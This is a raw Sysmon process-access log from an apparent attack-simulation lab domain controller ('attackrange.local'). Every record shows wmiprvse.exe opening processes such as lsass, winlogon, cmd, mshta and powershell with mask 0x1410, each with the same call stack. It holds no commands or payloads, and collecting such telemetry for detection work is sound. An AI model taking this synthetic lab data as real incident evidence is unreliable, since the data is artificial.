22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 